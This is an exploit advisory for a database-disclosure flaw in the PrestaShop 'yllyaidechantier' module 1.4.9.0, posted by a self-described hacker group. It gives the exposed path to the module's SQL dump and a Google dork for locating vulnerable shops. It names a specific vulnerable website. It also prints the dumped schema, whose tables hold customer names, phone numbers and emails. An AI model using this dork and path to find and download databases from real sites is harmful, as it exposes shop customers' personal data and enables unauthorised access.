PrestaShop yllyaidechantier 1.4.9.0 Database Disclosure

PrestaShop yllyaidechantier module version 1.4.9.0 suffers from a database disclosure vulnerability.


MD5 | 1f2faef03f356cef4707306055f5c252

###########################################################################

# Exploit Title : PrestaShop yllyaidechantier Modules 1.4.9.0 Database
Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 24/12/2018
# Vendor Homepage : prestashop.com
# Software Download Link : N/A
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 1.4.9.0
# Exploit Risk : Medium
# Google Dorks : inurl:''/modules/yllyaidechantier/db/''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]

###########################################################################

# Exploit :

/modules/yllyaidechantier/db/ydb.sql

###########################################################################

# Example SQL Database Dump Information Exposure =>

-- phpMyAdmin SQL Dump
-- version 4.0.4
-- http://www.phpmyadmin.net
--
-- Client: localhost
--
GA(c)nA(c)rA(c) le: Lun 07 Avril 2014 A 16:27
-- Version du serveur: 5.5.20-log
-- Version de PHP: 5.3.10

SET
SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
SET time_zone = "+00:00";


/*!40101 SET
@OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET
@OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET
@OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101
SET NAMES utf8 */;

--
-- Base de donnA(c)es: `velux`
--
CREATE DATABASE IF NOT EXISTS `velux`
DEFAULT CHARACTER SET latin1 COLLATE latin1_swedish_ci;
USE `velux`;

-- --------------------
------------------------------------

--
-- Structure de la table `ps_y_aidechantier_demande`
--


DROP TABLE IF EXISTS `ps_y_aidechantier_demande`;
CREATE TABLE IF NOT EXISTS
`ps_y_aidechantier_demande` (
`id_demande` int(11) NOT NULL AUTO_INCREMENT,
`id_template
` int(11) NOT NULL,
`id_customer` int(11) NOT NULL,
`id_scenario` int(11) NOT NULL,
`lastname`
varchar(500) NOT NULL,
`firstname` varchar(500) NOT NULL,
`phone` varchar(50) NOT NULL,

`email` varchar(500) NOT NULL,
`fax` varchar(50) NOT NULL,
`chantier_charpente` varchar(500)
NOT NULL,
`chantier_couverture` varchar(500) NOT NULL,
`chantier_fenetre` varchar(500) NOT NULL,

`chantier_raccord` varchar(500) NOT NULL,
`chantier_isolation` varchar(500) NOT NULL,

`chantier_domotique` varchar(500) NOT NULL,
`date_add` date NOT NULL,
PRIMARY KEY
(`id_demande`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1 AUTO_INCREMENT=1 ;

-- ----------------
----------------------------------------

--
-- Structure de la table `ps_y_aidechantier_scenario`
--

DROP TABLE IF
EXISTS `ps_y_aidechantier_scenario`;
CREATE TABLE IF NOT EXISTS `ps_y_aidechantier_scenario`
(
`id_scenario` int(11) NOT NULL AUTO_INCREMENT,
`id_template` int(11) NOT NULL,

`title` varchar(500) NOT NULL,
`price` double NOT NULL,
`date_add` date NOT NULL,

PRIMARY KEY (`id_scenario`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1
AUTO_INCREMENT=3 ;

-- --------------------------------------------------------

--
-- Structure de la table
`ps_y_aidechantier_template`
--

DROP TABLE IF EXISTS `ps_y_aidechantier_template`;
CREATE
TABLE IF NOT EXISTS `ps_y_aidechantier_template` (
`id_template` int(11)
NOT NULL AUTO_INCREMENT,
`id_product` int(11) NOT NULL,
`name` varchar(500) NOT NULL,

`date_add` date NOT NULL,
PRIMARY KEY (`id_template`),
UNIQUE KEY `id_product_2` (`id_product`),

KEY `id_product` (`id_product`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1
AUTO_INCREMENT=8 ;

/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT
*/;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101
SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;


###########################################################################

# Example Vulnerable Site =>

[+] portailpro.fr/modules/yllyaidechantier/db/ydb.sql

###########################################################################

# Discovered By Hacker KingSkrupellos from Cyberizm.Org Digital Security
Team

###########################################################################

Related Posts